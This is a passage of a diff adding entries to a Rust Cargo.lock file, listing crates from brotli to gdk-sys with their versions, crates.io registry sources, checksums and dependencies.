+name = "brotli"
+version = "8.0.2"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "4bd8b9603c7aa97359dbd97ecf258968c95f3adddd6db2f7e7a5bef101c84560"
+dependencies = [
+ "alloc-no-stdlib",
+ "alloc-stdlib",
+ "brotli-decompressor",
+]
+
+[[package]]
+name = "brotli-decompressor"
+version = "5.0.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "874bb8112abecc98cbd6d81ea4fa7e94fb9449648c93cc89aa40c81c24d7de03"
+dependencies = [
+ "alloc-no-stdlib",
+ "alloc-stdlib",
+]
+
+[[package]]
+name = "bumpalo"
+version = "3.20.2"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "5d20789868f4b01b2f2caec9f5c4e0213b41e3e5702a50157d699ae31ced2fcb"
+
+[[package]]
+name = "bytemuck"
+version = "1.25.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "c8efb64bd706a16a1bdde310ae86b351e4d21550d98d056f22f8a7f7a2183fec"
+
+[[package]]
+name = "byteorder"
+version = "1.5.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "1fd0f2584146f6f2ef48085050886acf353beff7305ebd1ae69500e27c67f64b"
+
+[[package]]
+name = "bytes"
+version = "1.11.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "1e748733b7cbc798e1434b6ac524f0c1ff2ab456fe201501e6497c8417a4fc33"
+dependencies = [
+ "serde",
+]
+
+[[package]]
+name = "cairo-rs"
+version = "0.18.5"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "8ca26ef0159422fb77631dc9d17b102f253b876fe1586b03b803e63a309b4ee2"
+dependencies = [
+ "bitflags 2.11.1",
+ "cairo-sys-rs",
+ "glib",
+ "libc",
+ "once_cell",
+ "thiserror 1.0.69",
+]
+
+[[package]]
+name = "cairo-sys-rs"
+version = "0.18.2"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "685c9fa8e590b8b3d678873528d83411db17242a73fccaed827770ea0fedda51"
+dependencies = [
+ "glib-sys",
+ "libc",
+ "system-deps",
+]
+
+[[package]]
+name = "camino"
+version = "1.2.2"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "e629a66d692cb9ff1a1c664e41771b3dcaf961985a9774c0eb0bd1b51cf60a48"
+dependencies = [
+ "serde_core",
+]
+
+[[package]]
+name = "cargo-platform"
+version = "0.1.9"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "e35af189006b9c0f00a064685c727031e3ed2d8020f7ba284d78cc2671bd36ea"
+dependencies = [
+ "serde",
+]
+
+[[package]]
+name = "cargo_metadata"
+version = "0.19.2"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "dd5eb614ed4c27c5d706420e4320fbe3216ab31fa1c33cd8246ac36dae4479ba"
+dependencies = [
+ "camino",
+ "cargo-platform",
+ "semver",
+ "serde",
+ "serde_json",
+ "thiserror 2.0.18",
+]
+
+[[package]]
+name = "cargo_toml"
+version = "0.22.3"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "374b7c592d9c00c1f4972ea58390ac6b18cbb6ab79011f3bdc90a0b82ca06b77"
+dependencies = [
+ "serde",
+ "toml 0.9.12+spec-1.1.0",
+]
+
+[[package]]
+name = "cc"
+version = "1.2.60"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "43c5703da9466b66a946814e1adf53ea2c90f10063b86290cc9eb67ce3478a20"
+dependencies = [
+ "find-msvc-tools",
+ "shlex",
+]
+
+[[package]]
+name = "cesu8"
+version = "1.1.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "6d43a04d8753f35258c91f8ec639f792891f748a1edbd759cf1dcea3382ad83c"
+
+[[package]]
+name = "cfb"
+version = "0.7.3"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "d38f2da7a0a2c4ccf0065be06397cc26a81f4e528be095826eee9d4adbb8c60f"
+dependencies = [
+ "byteorder",
+ "fnv",
+ "uuid",
+]
+
+[[package]]
+name = "cfg-expr"
+version = "0.15.8"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "d067ad48b8650848b989a59a86c6c36a995d02d2bf778d45c3c5d57bc2718f02"
+dependencies = [
+ "smallvec",
+ "target-lexicon",
+]
+
+[[package]]
+name = "cfg-if"
+version = "1.0.4"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "9330f8b2ff13f34540b44e946ef35111825727b38d33286ef986142615121801"
+
+[[package]]
+name = "cfg_aliases"
+version = "0.2.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "613afe47fcd5fac7ccf1db93babcb082c5994d996f20b8b159f2ad1658eb5724"
+
+[[package]]
+name = "chrono"
+version = "0.4.44"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "c673075a2e0e5f4a1dde27ce9dee1ea4558c7ffe648f576438a20ca1d2acc4b0"
+dependencies = [
+ "iana-time-zone",
+ "num-traits",
+ "serde",
+ "windows-link 0.2.1",
+]
+
+[[package]]
+name = "combine"
+version = "4.6.7"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "ba5a308b75df32fe02788e748662718f03fde005016435c444eea572398219fd"
+dependencies = [
+ "bytes",
+ "memchr",
+]
+
+[[package]]
+name = "compression-codecs"
+version = "0.4.37"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "eb7b51a7d9c967fc26773061ba86150f19c50c0d65c887cb1fbe295fd16619b7"
+dependencies = [
+ "compression-core",
+ "flate2",
+ "memchr",
+]
+
+[[package]]
+name = "compression-core"
+version = "0.4.31"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "75984efb6ed102a0d42db99afb6c1948f0380d1d91808d5529916e6c08b49d8d"
+
+[[package]]
+name = "concurrent-queue"
+version = "2.5.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "4ca0197aee26d1ae37445ee532fefce43251d24cc7c166799f4d46817f1d3973"
+dependencies = [
+ "crossbeam-utils",
+]
+
+[[package]]
+name = "convert_case"
+version = "0.4.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "6245d59a3e82a7fc217c5828a6692dbc6dfb63a0c8c90495621f7b9d79704a0e"
+
+[[package]]
+name = "cookie"
+version = "0.18.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "4ddef33a339a91ea89fb53151bd0a4689cfce27055c291dfa69945475d22c747"
+dependencies = [
+ "percent-encoding",
+ "time",
+ "version_check",
+]
+
+[[package]]
+name = "cookie_store"
+version = "0.22.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "15b2c103cf610ec6cae3da84a766285b42fd16aad564758459e6ecf128c75206"
+dependencies = [
+ "cookie",
+ "document-features",
+ "idna",
+ "log",
+ "publicsuffix",
+ "serde",
+ "serde_derive",
+ "serde_json",
+ "time",
+ "url",
+]
+
+[[package]]
+name = "core-foundation"
+version = "0.10.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "b2a6cd9ae233e7f62ba4e9353e81a88df7fc8a5987b8d445b4d90c879bd156f6"
+dependencies = [
+ "core-foundation-sys",
+ "libc",
+]
+
+[[package]]
+name = "core-foundation-sys"
+version = "0.8.7"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "773648b94d0e5d620f64f280777445740e61fe701025087ec8b57f45c791888b"
+
+[[package]]
+name = "core-graphics"
+version = "0.25.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "064badf302c3194842cf2c5d61f56cc88e54a759313879cdf03abdd27d0c3b97"
+dependencies = [
+ "bitflags 2.11.1",
+ "core-foundation",
+ "core-graphics-types",
+ "foreign-types",
+ "libc",
+]
+
+[[package]]
+name = "core-graphics-types"
+version = "0.2.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "3d44a101f213f6c4cdc1853d4b78aef6db6bdfa3468798cc1d9912f4735013eb"
+dependencies = [
+ "bitflags 2.11.1",
+ "core-foundation",
+ "libc",
+]
+
+[[package]]
+name = "cpufeatures"
+version = "0.2.17"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "59ed5838eebb26a2bb2e58f6d5b5316989ae9d08bab10e0e6d103e656d1b0280"
+dependencies = [
+ "libc",
+]
+
+[[package]]
+name = "crc32fast"
+version = "1.5.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "9481c1c90cbf2ac953f07c8d4a58aa3945c425b7185c9154d67a65e4230da511"
+dependencies = [
+ "cfg-if",
+]
+
+[[package]]
+name = "crossbeam-channel"
+version = "0.5.15"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "82b8f8f868b36967f9606790d1903570de9ceaf870a7bf9fbbd3016d636a2cb2"
+dependencies = [
+ "crossbeam-utils",
+]
+
+[[package]]
+name = "crossbeam-utils"
+version = "0.8.21"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "d0a5c400df2834b80a4c3327b3aad3a4c4cd4de0629063962b03235697506a28"
+
+[[package]]
+name = "crypto-common"
+version = "0.1.7"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "78c8292055d1c1df0cce5d180393dc8cce0abec0a7102adb6c7b1eef6016d60a"
+dependencies = [
+ "generic-array",
+ "typenum",
+]
+
+[[package]]
+name = "cssparser"
+version = "0.29.6"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "f93d03419cb5950ccfd3daf3ff1c7a36ace64609a1a8746d493df1ca0afde0fa"
+dependencies = [
+ "cssparser-macros",
+ "dtoa-short",
+ "itoa",
+ "matches",
+ "phf 0.10.1",
+ "proc-macro2",
+ "quote",
+ "smallvec",
+ "syn 1.0.109",
+]
+
+[[package]]
+name = "cssparser"
+version = "0.36.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "dae61cf9c0abb83bd659dab65b7e4e38d8236824c85f0f804f173567bda257d2"
+dependencies = [
+ "cssparser-macros",
+ "dtoa-short",
+ "itoa",
+ "phf 0.13.1",
+ "smallvec",
+]
+
+[[package]]
+name = "cssparser-macros"
+version = "0.6.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "13b588ba4ac1a99f7f2964d24b3d896ddc6bf847ee3855dbd4366f058cfcd331"
+dependencies = [
+ "quote",
+ "syn 2.0.117",
+]
+
+[[package]]
+name = "ctor"
+version = "0.2.9"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "32a2785755761f3ddc1492979ce1e48d2c00d09311c39e4466429188f3dd6501"
+dependencies = [
+ "quote",
+ "syn 2.0.117",
+]
+
+[[package]]
+name = "darling"
+version = "0.20.11"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "fc7f46116c46ff9ab3eb1597a45688b6715c6e628b5c133e288e709a29bcb4ee"
+dependencies = [
+ "darling_core 0.20.11",
+ "darling_macro 0.20.11",
+]
+
+[[package]]
+name = "darling"
+version = "0.23.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "25ae13da2f202d56bd7f91c25fba009e7717a1e4a1cc98a76d844b65ae912e9d"
+dependencies = [
+ "darling_core 0.23.0",
+ "darling_macro 0.23.0",
+]
+
+[[package]]
+name = "darling_core"
+version = "0.20.11"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "0d00b9596d185e565c2207a0b01f8bd1a135483d02d9b7b0a54b11da8d53412e"
+dependencies = [
+ "fnv",
+ "ident_case",
+ "proc-macro2",
+ "quote",
+ "strsim",
+ "syn 2.0.117",
+]
+
+[[package]]
+name = "darling_core"
+version = "0.23.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "9865a50f7c335f53564bb694ef660825eb8610e0a53d3e11bf1b0d3df31e03b0"
+dependencies = [
+ "ident_case",
+ "proc-macro2",
+ "quote",
+ "strsim",
+ "syn 2.0.117",
+]
+
+[[package]]
+name = "darling_macro"
+version = "0.20.11"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "fc34b93ccb385b40dc71c6fceac4b2ad23662c7eeb248cf10d529b7e055b6ead"
+dependencies = [
+ "darling_core 0.20.11",
+ "quote",
+ "syn 2.0.117",
+]
+
+[[package]]
+name = "darling_macro"
+version = "0.23.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "ac3984ec7bd6cfa798e62b4a642426a5be0e68f9401cfc2a01e3fa9ea2fcdb8d"
+dependencies = [
+ "darling_core 0.23.0",
+ "quote",
+ "syn 2.0.117",
+]
+
+[[package]]
+name = "data-encoding"
+version = "2.10.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "d7a1e2f27636f116493b8b860f5546edb47c8d8f8ea73e1d2a20be88e28d1fea"
+
+[[package]]
+name = "der-parser"
+version = "10.0.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "07da5016415d5a3c4dd39b11ed26f915f52fc4e0dc197d87908bc916e51bc1a6"
+dependencies = [
+ "asn1-rs",
+ "displaydoc",
+ "nom",
+ "num-bigint",
+ "num-traits",
+ "rusticata-macros",
+]
+
+[[package]]
+name = "deranged"
+version = "0.5.8"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "7cd812cc2bc1d69d4764bd80df88b4317eaef9e773c75226407d9bc0876b211c"
+dependencies = [
+ "powerfmt",
+ "serde_core",
+]
+
+[[package]]
+name = "derive_builder"
+version = "0.20.2"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "507dfb09ea8b7fa618fcf76e953f4f5e192547945816d5358edffe39f6f94947"
+dependencies = [
+ "derive_builder_macro",
+]
+
+[[package]]
+name = "derive_builder_core"
+version = "0.20.2"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "2d5bcf7b024d6835cfb3d473887cd966994907effbe9227e8c8219824d06c4e8"
+dependencies = [
+ "darling 0.20.11",
+ "proc-macro2",
+ "quote",
+ "syn 2.0.117",
+]
+
+[[package]]
+name = "derive_builder_macro"
+version = "0.20.2"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "ab63b0e2bf4d5928aff72e83a7dace85d7bba5fe12dcc3c5a572d78caffd3f3c"
+dependencies = [
+ "derive_builder_core",
+ "syn 2.0.117",
+]
+
+[[package]]
+name = "derive_more"
+version = "0.99.20"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "6edb4b64a43d977b8e99788fe3a04d483834fba1215a7e02caa415b626497f7f"
+dependencies = [
+ "convert_case",
+ "proc-macro2",
+ "quote",
+ "rustc_version",
+ "syn 2.0.117",
+]
+
+[[package]]
+name = "derive_more"
+version = "2.1.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "d751e9e49156b02b44f9c1815bcb94b984cdcc4396ecc32521c739452808b134"
+dependencies = [
+ "derive_more-impl",
+]
+
+[[package]]
+name = "derive_more-impl"
+version = "2.1.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "799a97264921d8623a957f6c3b9011f3b5492f557bbb7a5a19b7fa6d06ba8dcb"
+dependencies = [
+ "proc-macro2",
+ "quote",
+ "rustc_version",
+ "syn 2.0.117",
+]
+
+[[package]]
+name = "digest"
+version = "0.10.7"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "9ed9a281f7bc9b7576e61468ba615a66a5c8cfdff42420a70aa82701a3b1e292"
+dependencies = [
+ "block-buffer",
+ "crypto-common",
+ "subtle",
+]
+
+[[package]]
+name = "dirs"
+version = "6.0.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "c3e8aa94d75141228480295a7d0e7feb620b1a5ad9f12bc40be62411e38cce4e"
+dependencies = [
+ "dirs-sys",
+]
+
+[[package]]
+name = "dirs-sys"
+version = "0.5.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "e01a3366d27ee9890022452ee61b2b63a67e6f13f58900b651ff5665f0bb1fab"
+dependencies = [
+ "libc",
+ "option-ext",
+ "redox_users",
+ "windows-sys 0.61.2",
+]
+
+[[package]]
+name = "dispatch2"
+version = "0.3.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "1e0e367e4e7da84520dedcac1901e4da967309406d1e51017ae1abfb97adbd38"
+dependencies = [
+ "bitflags 2.11.1",
+ "block2",
+ "libc",
+ "objc2",
+]
+
+[[package]]
+name = "displaydoc"
+version = "0.2.5"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "97369cbbc041bc366949bc74d34658d6cda5621039731c6310521892a3a20ae0"
+dependencies = [
+ "proc-macro2",
+ "quote",
+ "syn 2.0.117",
+]
+
+[[package]]
+name = "dlopen2"
+version = "0.8.2"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "5e2c5bd4158e66d1e215c49b837e11d62f3267b30c92f1d171c4d3105e3dc4d4"
+dependencies = [
+ "dlopen2_derive",
+ "libc",
+ "once_cell",
+ "winapi",
+]
+
+[[package]]
+name = "dlopen2_derive"
+version = "0.4.3"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "0fbbb781877580993a8707ec48672673ec7b81eeba04cfd2310bd28c08e47c8f"
+dependencies = [
+ "proc-macro2",
+ "quote",
+ "syn 2.0.117",
+]
+
+[[package]]
+name = "document-features"
+version = "0.2.12"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "d4b8a88685455ed29a21542a33abd9cb6510b6b129abadabdcef0f4c55bc8f61"
+dependencies = [
+ "litrs",
+]
+
+[[package]]
+name = "dom_query"
+version = "0.27.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "521e380c0c8afb8d9a1e83a1822ee03556fc3e3e7dbc1fd30be14e37f9cb3f89"
+dependencies = [
+ "bit-set",
+ "cssparser 0.36.0",
+ "foldhash 0.2.0",
+ "html5ever 0.38.0",
+ "precomputed-hash",
+ "selectors 0.36.1",
+ "tendril 0.5.0",
+]
+
+[[package]]
+name = "dpi"
+version = "0.1.2"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "d8b14ccef22fc6f5a8f4d7d768562a182c04ce9a3b3157b91390b52ddfdf1a76"
+dependencies = [
+ "serde",
+]
+
+[[package]]
+name = "dtoa"
+version = "1.0.11"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "4c3cf4824e2d5f025c7b531afcb2325364084a16806f6d47fbc1f5fbd9960590"
+
+[[package]]
+name = "dtoa-short"
+version = "0.3.5"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "cd1511a7b6a56299bd043a9c167a6d2bfb37bf84a6dfceaba651168adfb43c87"
+dependencies = [
+ "dtoa",
+]
+
+[[package]]
+name = "dunce"
+version = "1.0.5"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "92773504d58c093f6de2459af4af33faa518c13451eb8f2b5698ed3d36e7c813"
+
+[[package]]
+name = "dyn-clone"
+version = "1.0.20"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "d0881ea181b1df73ff77ffaaf9c7544ecc11e82fba9b5f27b262a3c73a332555"
+
+[[package]]
+name = "either"
+version = "1.15.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "48c757948c5ede0e46177b7add2e67155f70e33c07fea8284df6576da70b3719"
+
+[[package]]
+name = "embed-resource"
+version = "3.0.8"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "63a1d0de4f2249aa0ff5884d7080814f446bb241a559af6c170a41e878ed2d45"
+dependencies = [
+ "cc",
+ "memchr",
+ "rustc_version",
+ "toml 0.9.12+spec-1.1.0",
+ "vswhom",
+ "winreg",
+]
+
+[[package]]
+name = "embed_plist"
+version = "1.2.2"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "4ef6b89e5b37196644d8796de5268852ff179b44e96276cf4290264843743bb7"
+
+[[package]]
+name = "endi"
+version = "1.1.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "66b7e2430c6dff6a955451e2cfc438f09cea1965a9d6f87f7e3b90decc014099"
+
+[[package]]
+name = "enum-as-inner"
+version = "0.6.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "a1e6a265c649f3f5979b601d26f1d05ada116434c87741c9493cb56218f76cbc"
+dependencies = [
+ "heck 0.5.0",
+ "proc-macro2",
+ "quote",
+ "syn 2.0.117",
+]
+
+[[package]]
+name = "enumflags2"
+version = "0.7.12"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "1027f7680c853e056ebcec683615fb6fbbc07dbaa13b4d5d9442b146ded4ecef"
+dependencies = [
+ "enumflags2_derive",
+ "serde",
+]
+
+[[package]]
+name = "enumflags2_derive"
+version = "0.7.12"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "67c78a4d8fdf9953a5c9d458f9efe940fd97a0cab0941c075a813ac594733827"
+dependencies = [
+ "proc-macro2",
+ "quote",
+ "syn 2.0.117",
+]
+
+[[package]]
+name = "equivalent"
+version = "1.0.2"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "877a4ace8713b0bcf2a4e7eec82529c029f1d0619886d18145fea96c3ffe5c0f"
+
+[[package]]
+name = "erased-serde"
+version = "0.4.10"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "d2add8a07dd6a8d93ff627029c51de145e12686fbc36ecb298ac22e74cf02dec"
+dependencies = [
+ "serde",
+ "serde_core",
+ "typeid",
+]
+
+[[package]]
+name = "errno"
+version = "0.3.14"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "39cab71617ae0d63f51a36d69f866391735b51691dbda63cf6f96d042b63efeb"
+dependencies = [
+ "libc",
+ "windows-sys 0.61.2",
+]
+
+[[package]]
+name = "event-listener"
+version = "5.4.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "e13b66accf52311f30a0db42147dadea9850cb48cd070028831ae5f5d4b856ab"
+dependencies = [
+ "concurrent-queue",
+ "parking",
+ "pin-project-lite",
+]
+
+[[package]]
+name = "event-listener-strategy"
+version = "0.5.4"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "8be9f3dfaaffdae2972880079a491a1a8bb7cbed0b8dd7a347f668b4150a3b93"
+dependencies = [
+ "event-listener",
+ "pin-project-lite",
+]
+
+[[package]]
+name = "fastrand"
+version = "2.4.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "9f1f227452a390804cdb637b74a86990f2a7d7ba4b7d5693aac9b4dd6defd8d6"
+
+[[package]]
+name = "fdeflate"
+version = "0.3.7"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "1e6853b52649d4ac5c0bd02320cddc5ba956bdb407c4b75a2c6b75bf51500f8c"
+dependencies = [
+ "simd-adler32",
+]
+
+[[package]]
+name = "field-offset"
+version = "0.3.6"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "38e2275cc4e4fc009b0669731a1e5ab7ebf11f469eaede2bab9309a5b4d6057f"
+dependencies = [
+ "memoffset",
+ "rustc_version",
+]
+
+[[package]]
+name = "find-msvc-tools"
+version = "0.1.9"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "5baebc0774151f905a1a2cc41989300b1e6fbb29aff0ceffa1064fdd3088d582"
+
+[[package]]
+name = "flate2"
+version = "1.1.9"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "843fba2746e448b37e26a819579957415c8cef339bf08564fe8b7ddbd959573c"
+dependencies = [
+ "crc32fast",
+ "miniz_oxide",
+]
+
+[[package]]
+name = "fnv"
+version = "1.0.7"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "3f9eec918d3f24069decb9af1554cad7c880e2da24a9afd88aca000531ab82c1"
+
+[[package]]
+name = "foldhash"
+version = "0.1.5"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "d9c4f5dac5e15c24eb999c26181a6ca40b39fe946cbe4c263c7209467bc83af2"
+
+[[package]]
+name = "foldhash"
+version = "0.2.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "77ce24cb58228fbb8aa041425bb1050850ac19177686ea6e0f41a70416f56fdb"
+
+[[package]]
+name = "foreign-types"
+version = "0.5.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "d737d9aa519fb7b749cbc3b962edcf310a8dd1f4b67c91c4f83975dbdd17d965"
+dependencies = [
+ "foreign-types-macros",
+ "foreign-types-shared",
+]
+
+[[package]]
+name = "foreign-types-macros"
+version = "0.2.3"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "1a5c6c585bc94aaf2c7b51dd4c2ba22680844aba4c687be581871a6f518c5742"
+dependencies = [
+ "proc-macro2",
+ "quote",
+ "syn 2.0.117",
+]
+
+[[package]]
+name = "foreign-types-shared"
+version = "0.3.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "aa9a19cbb55df58761df49b23516a86d432839add4af60fc256da840f66ed35b"
+
+[[package]]
+name = "form_urlencoded"
+version = "1.2.2"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "cb4cb245038516f5f85277875cdaa4f7d2c9a0fa0468de06ed190163b1581fcf"
+dependencies = [
+ "percent-encoding",
+]
+
+[[package]]
+name = "futf"
+version = "0.1.5"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "df420e2e84819663797d1ec6544b13c5be84629e7bb00dc960d6917db2987843"
+dependencies = [
+ "mac",
+ "new_debug_unreachable",
+]
+
+[[package]]
+name = "futures"
+version = "0.3.32"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "8b147ee9d1f6d097cef9ce628cd2ee62288d963e16fb287bd9286455b241382d"
+dependencies = [
+ "futures-channel",
+ "futures-core",
+ "futures-executor",
+ "futures-io",
+ "futures-sink",
+ "futures-task",
+ "futures-util",
+]
+
+[[package]]
+name = "futures-channel"
+version = "0.3.32"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "07bbe89c50d7a535e539b8c17bc0b49bdb77747034daa8087407d655f3f7cc1d"
+dependencies = [
+ "futures-core",
+ "futures-sink",
+]
+
+[[package]]
+name = "futures-core"
+version = "0.3.32"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "7e3450815272ef58cec6d564423f6e755e25379b217b0bc688e295ba24df6b1d"
+
+[[package]]
+name = "futures-executor"
+version = "0.3.32"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "baf29c38818342a3b26b5b923639e7b1f4a61fc5e76102d4b1981c6dc7a7579d"
+dependencies = [
+ "futures-core",
+ "futures-task",
+ "futures-util",
+]
+
+[[package]]
+name = "futures-io"
+version = "0.3.32"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "cecba35d7ad927e23624b22ad55235f2239cfa44fd10428eecbeba6d6a717718"
+
+[[package]]
+name = "futures-lite"
+version = "2.6.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "f78e10609fe0e0b3f4157ffab1876319b5b0db102a2c60dc4626306dc46b44ad"
+dependencies = [
+ "fastrand",
+ "futures-core",
+ "futures-io",
+ "parking",
+ "pin-project-lite",
+]
+
+[[package]]
+name = "futures-macro"
+version = "0.3.32"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "e835b70203e41293343137df5c0664546da5745f82ec9b84d40be8336958447b"
+dependencies = [
+ "proc-macro2",
+ "quote",
+ "syn 2.0.117",
+]
+
+[[package]]
+name = "futures-sink"
+version = "0.3.32"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "c39754e157331b013978ec91992bde1ac089843443c49cbc7f46150b0fad0893"
+
+[[package]]
+name = "futures-task"
+version = "0.3.32"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "037711b3d59c33004d3856fbdc83b99d4ff37a24768fa1be9ce3538a1cde4393"
+
+[[package]]
+name = "futures-util"
+version = "0.3.32"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "389ca41296e6190b48053de0321d02a77f32f8a5d2461dd38762c0593805c6d6"
+dependencies = [
+ "futures-channel",
+ "futures-core",
+ "futures-io",
+ "futures-macro",
+ "futures-sink",
+ "futures-task",
+ "memchr",
+ "pin-project-lite",
+ "slab",
+]
+
+[[package]]
+name = "fxhash"
+version = "0.2.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "c31b6d751ae2c7f11320402d34e41349dd1016f8d5d45e48c4312bc8625af50c"
+dependencies = [
+ "byteorder",
+]
+
+[[package]]
+name = "gdk"
+version = "0.18.2"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "d9f245958c627ac99d8e529166f9823fb3b838d1d41fd2b297af3075093c2691"
+dependencies = [
+ "cairo-rs",
+ "gdk-pixbuf",
+ "gdk-sys",
+ "gio",
+ "glib",
+ "libc",
+ "pango",
+]
+
+[[package]]
+name = "gdk-pixbuf"
+version = "0.18.5"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "50e1f5f1b0bfb830d6ccc8066d18db35c487b1b2b1e8589b5dfe9f07e8defaec"
+dependencies = [
+ "gdk-pixbuf-sys",
+ "gio",
+ "glib",
+ "libc",
+ "once_cell",
+]
+
+[[package]]
+name = "gdk-pixbuf-sys"
+version = "0.18.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "3f9839ea644ed9c97a34d129ad56d38a25e6756f99f3a88e15cd39c20629caf7"
+dependencies = [
+ "gio-sys",
+ "glib-sys",
+ "gobject-sys",
+ "libc",
+ "system-deps",
+]
+
+[[package]]
+name = "gdk-sys"
+version = "0.18.2"
